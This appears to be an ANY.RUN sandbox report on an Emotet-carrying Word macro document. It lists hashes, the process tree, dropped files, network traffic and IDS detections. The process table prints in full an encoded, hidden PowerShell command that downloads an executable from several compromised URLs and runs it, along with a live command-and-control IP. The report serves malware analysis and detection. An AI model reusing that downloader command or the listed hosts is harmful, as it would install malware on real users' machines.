analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

871d23faddece4c7ee8793c5ccc76b49560c61add37787444a9445cf6e29fe4b.doc

Full analysis: https://app.any.run/tasks/32d5a3a6-0d52-4b85-8045-dd372960a98e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 17, 2020, 15:48:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Vel., Author: Raphal Joly, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 14:46:00 2020, Last Saved Time/Date: Fri Jan 17 14:46:00 2020, Number of Pages: 2, Number of Words: 4, Number of Characters: 29, Security: 0
MD5:

6F67A60ACE7609B0DA9A66D06239B79A

SHA1:

A25EC5F9F89BE005A6FD61DE241D03B97D049FEE

SHA256:

871D23FADDECE4C7EE8793C5CCC76B49560C61ADD37787444A9445CF6E29FE4B

SSDEEP:

6144:c0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+vpvFrw6:c0E3dxtR/iU9mvUPvLrw6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • serialfunc.exe (PID: 2192)
      • 858.exe (PID: 3912)
      • 858.exe (PID: 2448)
      • serialfunc.exe (PID: 3744)
    • Downloads executable files from the Internet

      • Powershell.exe (PID: 3800)
    • Emotet process was detected

      • 858.exe (PID: 2448)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 3744)
    • Connects to CnC server

      • serialfunc.exe (PID: 3744)
    • EMOTET was detected

      • serialfunc.exe (PID: 3744)
  • SUSPICIOUS

    • Creates files in the user directory

      • Powershell.exe (PID: 3800)
    • Executed via WMI

      • Powershell.exe (PID: 3800)
    • PowerShell script executed

      • Powershell.exe (PID: 3800)
    • Executable content was dropped or overwritten

      • Powershell.exe (PID: 3800)
      • 858.exe (PID: 2448)
    • Starts itself from another location

      • 858.exe (PID: 2448)
    • Connects to server without host name

      • serialfunc.exe (PID: 3744)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2572)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2572)
    • Manual execution by user

      • taskmgr.exe (PID: 792)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: Vel.
Subject: -
Author: Raphaël Joly
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:01:17 14:46:00
ModifyDate: 2020:01:17 14:46:00
Pages: 2
Words: 4
Characters: 29
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 32
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
7
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 858.exe no specs #EMOTET 858.exe serialfunc.exe no specs #EMOTET serialfunc.exe taskmgr.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2572"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\871d23faddece4c7ee8793c5ccc76b49560c61add37787444a9445cf6e29fe4b.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3800Powershell -w hidden -en JABEAGoAZgBwAHoAdQB4AGkAawBiAD0AJwBVAHUAZgBqAHgAdABoAGwAZwBoACcAOwAkAEUAcgBpAGsAYwBvAHEAeQBpACAAPQAgACcAOAA1ADgAJwA7ACQAWQB2AGUAcABsAGEAbABpAGoAbwBlAHkAPQAnAFkAYQBqAHIAYwBvAGYAbwBxAHcAZQB0AGUAJwA7ACQAVABzAG4AZABqAHcAdAB5AHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAcgBpAGsAYwBvAHEAeQBpACsAJwAuAGUAeABlACcAOwAkAEMAdwBuAG4AdgBiAHkAdABzAHoAYgA9ACcASwBmAGEAbABjAHgAaQBrAHgAJwA7ACQATwBpAGgAaABuAGsAYgBhAGcAYQBkAGwAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBFAHQALgBXAEUAYgBDAGwASQBFAE4AdAA7ACQAVABuAG0AdABuAGcAcABhAGoAeQA9ACcAaAB0AHQAcAA6AC8ALwBuAGUAaQBsAHcAaQBsAGwAaQBhAG0AcwBvAG4ALgBjAGEALwBiAGEAYwBrAHUAcAAvAGsAeABXAEgALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG4AZQB0AGsAYQBmAGUAbQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBhAGkAbgB0AC8AdABrAHUANwBhAHgALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHYAaQBiAGEAbQBhAHMAdABlAHIAYgBhAHQAYwBoAC4AYwBvAG0ALwBOAGUAdwBzAGwAZQB0AHQAZQByAC8AdQBhAHEAdABlAG0AeQAvACoAaAB0AHQAcABzADoALwAvAHAAaABvAGUAbgBpAHgAcwB0AG8AbgBlAGEAbgBkAGwAYQBtAGkAbgBhAHQAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFkANgA0AFUAbgBxADQAVAAwAC8AKgBoAHQAdABwAHMAOgAvAC8AdABlAHgAYwBsAHUAYgBiAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwAwAFYANABhAGoAeAAvACcALgAiAHMAcABgAEwAaQBUACIAKAAnACoAJwApADsAJABEAG8AawBmAGgAawByAHYAawB1AGgAcgA9ACcAWgB1AGEAaABxAHMAYgBqAGEAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBsAGcAZwBnAGQAYwB5ACAAaQBuACAAJABUAG4AbQB0AG4AZwBwAGEAagB5ACkAewB0AHIAeQB7ACQATwBpAGgAaABuAGsAYgBhAGcAYQBkAGwAbgAuACIARABgAE8AVwBgAE4ATABPAEEAZABGAGAASQBsAGUAIgAoACQAVwBsAGcAZwBnAGQAYwB5ACwAIAAkAFQAcwBuAGQAagB3AHQAeQByACkAOwAkAFQAcgBnAHMAZABmAGcAdABqAGcAcgBzAGwAPQAnAEYAdQBqAGQAbwBqAGEAZABkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAVABzAG4AZABqAHcAdAB5AHIAKQAuACIAbABFAGAATgBnAGAAVABIACIAIAAtAGcAZQAgADIANgAxADgANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYABBAHIAdAAiACgAJABUAHMAbgBkAGoAdwB0AHkAcgApADsAJABYAHMAdABuAGcAdgBsAHIAYQA9ACcAUgBiAGsAeABiAHMAZABoAHYAaQBsAHYAJwA7AGIAcgBlAGEAawA7ACQAQQB2AGwAdABuAGQAawBiAHgAagBiAD0AJwBLAHcAYQBxAGcAcgBjAHMAYgBkAG0AegAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAGcAeQBsAHcAZQB3AGcAYQB6AHkAbQBsAD0AJwBFAGEAdgBsAHkAcwBrAHYAcwBlAGUAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3912"C:\Users\admin\858.exe" C:\Users\admin\858.exePowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2448--e90241f9C:\Users\admin\858.exe
858.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2192"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe858.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Exit code:
0
Version:
1, 0, 0, 1
3744--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Version:
1, 0, 0, 1
792"C:\Windows\system32\taskmgr.exe" /4C:\Windows\system32\taskmgr.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Task Manager
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 745
Read events
1 903
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2572WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA88F.tmp.cvr
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF89BBF577F2518F0A.TMP
MD5:
SHA256:
3800Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8P9ZQBV70X5CQUSE683R.temp
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFEE15A59D67DB18C1.TMP
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF8BD99EA501A6ECDB.TMP
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFDBB24F6F4AA2D7F6.TMP
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFDB129B697D03F4CC.TMP
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ABC25AFB-3FF6-4626-9CF9-952631751234}.tmp
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF1338E60999FBEC13.TMP
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AFAC0412-0E94-4968-A139-1F0D85E199FA}.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3744
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/sayE
US
binary
132 b
malicious
3800
Powershell.exe
GET
200
208.91.198.220:80
http://neilwilliamson.ca/backup/kxWH/
US
executable
332 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3744
serialfunc.exe
100.6.23.40:80
MCI Communications Services, Inc. d/b/a Verizon Business
US
malicious
3800
Powershell.exe
208.91.198.220:80
neilwilliamson.ca
PDR
US
malicious

DNS requests

Domain
IP
Reputation
neilwilliamson.ca
  • 208.91.198.220
suspicious

Threats

PID
Process
Class
Message
3800
Powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3800
Powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3800
Powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3744
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
3744
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
3744
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
1 ETPRO signatures available at the full report
No debug info